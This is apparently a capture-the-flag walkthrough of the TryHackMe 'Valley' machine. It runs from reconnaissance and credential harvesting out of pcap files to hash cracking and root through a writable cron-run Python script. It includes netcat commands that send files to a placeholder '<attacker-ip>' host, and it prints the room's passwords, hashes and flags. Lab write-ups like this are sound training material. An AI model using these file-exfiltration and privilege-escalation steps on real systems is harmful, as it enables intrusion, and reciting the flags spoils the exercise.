Writeups
THM Valley
Recon:
We first get all our exposed ports from Nmap, to see what we can work with. After that, we want to see what is the structure of the website, we’ll use FFUF to enumerate addresses we can work with.
nmap -sV -sC -v 10.64.165.117
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:84:2a:c1:22:5a:10:f1:66:16:dd:a0:f6:04:62:95 (RSA)
| 256 42:9e:2f:f6:3e:5a:db:51:99:62:71:c4:8c:22:3e:bb (ECDSA)
|_ 256 2e:a0:a5:6c:d9:83:e0:01:6c:b9:8a:60:9b:63:86:72 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|http-title: Site doesn’t have a title (text/html).
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We first check the website and run a ffuf for further enumeration #### ffuf -u http://10.64.165.117/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt /gallery /static /pricing #### ffuf -u http://10.64.165.117/static/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt we ffuf the static and get a few numbers to check #### static/00 returns:
dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts
http://10.64.165.117/dev1243224123123/ returns a login page
Strangely enough the login doesn’t seem to send requests out to a database, the username and pass might be hardcoded
As expected we find this inside the login-form-submit button
>if (username === “siemDev” && password === “california”)
{
>window.location.href = “/dev1243224123123/devNotes37370.txt”;
http://10.64.165.117/dev1243224123123/devNotes37370.txt returns:
dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port
Ran some extra nmap and we found
PORT STATE SERVICE VERSION
37370/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
___
Vulnerability analysis:
This might be our ftp server reusing some credentials
At first, it hangs lets try direct ftp. We connect to the ftp server
with
>ftp siemDev@10.64.165.117 -p 37370
We find some pcap file and download all of them for analysis
FTPpcaps contained some interesting informations:
USER anonymous
PASS anonymous
FTP-DATA AnnualReport.txt
Line-based text data
AnnualReport.txt BusinessReport.txt CISOReport.txt HrReport.txt
ItReport.txt SecurityReport.txt
HTTP1pcap
GET /testcat_mb.html
Referer: http://www.testingmcafeesites.com
Mostly just testing some security using this testing address
HTTP2pcap
USER valleyDev
PASS ph0t0s1234
We test SSH & FTP
SSH works. We see a user.txt We cat the content of the file.
THM{k@l1_1n_th3_v@lley}
___ # Binary exploitation: #### Next we check sudo -l Sorry, user valleyDev may not run sudo on valley. #### First we want to download our Authenticator. We first need to download the Authenticator. nc -lvnp 6969 > valleyAuthenticator
This sets a netcat listener on port 6969 and everything sent will be stored in valleyAuthenticator
Next on our victim machine
nc <attacker-ip> 6969 < valleyAuthenticator
We use netcat installed on the victims machine to send the content of valleyAuthenticator file to our listener
We should now have our file locally to work on
We first inspect the strings composing the file with
strings valleyAuthenticator > valleystrings.txt
We reduce the noise with awk hiding everything that isn’t atleast 10char long
awk ‘length($0) >= 10’ valleystrings.txt
We find out that the file is encoded with upx so we go again after decoding
upx -d valleyAuthenticator
strings valleyAuthenticator > unpackedstrings.txt
cat unpackedstrings.txt | awk ‘length($0) >= 7’
Before parsing through all of this we run
cat unpackedstrings.txt | awk ‘length($0) >= 7’ | grep pass -C 3
This is very lucky as we get our first flag immediatly.
dd2921cc76ee3abfd2beb60709056cfb
Next we launch the Authenticator:
Welcome to Valley Inc. Authenticator
What is your username:
What is your password:
Authenticated
Wrong Password or Username
basic_string::_M_construct null not valid
The first line in our Authenticator is the money line its md5
We expand our line count with grep to 5 to make sure we get all the hashes
cat unpackedstrings.txt | awk ‘length($0) >= 7’ | grep pass -C 5
I9\$xv.I
e6722920bab2326f8217e4bf6b1b58ac
dd2921cc76ee3abfd2beb60709056cfb
Welcome to Valley Inc. Authenticator
What is your username:
What is your password:
Authenticated
Wrong Password or Username
basic_string::_M_construct null not valid
basic_string::_M_construct null not valid
terminate called recursively
Post exploitation:
Next we run through crackstation.net our md5
dd2921cc76ee3abfd2beb60709056cfb valley
e6722920bab2326f8217e4bf6b1b58ac liberty123
We run valleyAuthenticator with
user: valley password: liberty123
It confirms our user and password so we switch to our new user with su
su valley
We are now valley
We still can’t sudo -l so we’re going to send out linpeas to scan for vulns
Lets repeat our nc commands from earlier but with linpeas.sh
nc -lvnp 6969 > linpeas.sh
nc <attacker-ip> 6969 < linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Not much to find with linpeas / it hangs and never finishes but theres a cronjob running as root in here to transform images using base64
Checking our id we are part of the valleyAdmin group and we find a python3.8 to be usable not with root but valleyAdmin
base64.py is also under valleyAdmin, since we can modify it lets just add a rev shell and wait for cron
We get a root shell after a few seconds when the cronjob runs.
cat the root flag
THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc}
Notes:
Hard-coded credentials lead to a full system compromise, the webpage we have access at /dev1243224123123. We then get unrestricted access to the logs of a pcap file, which leads to SSH compromise. We then download the Authenticator file and pull it appart for some hashed but weak passwords.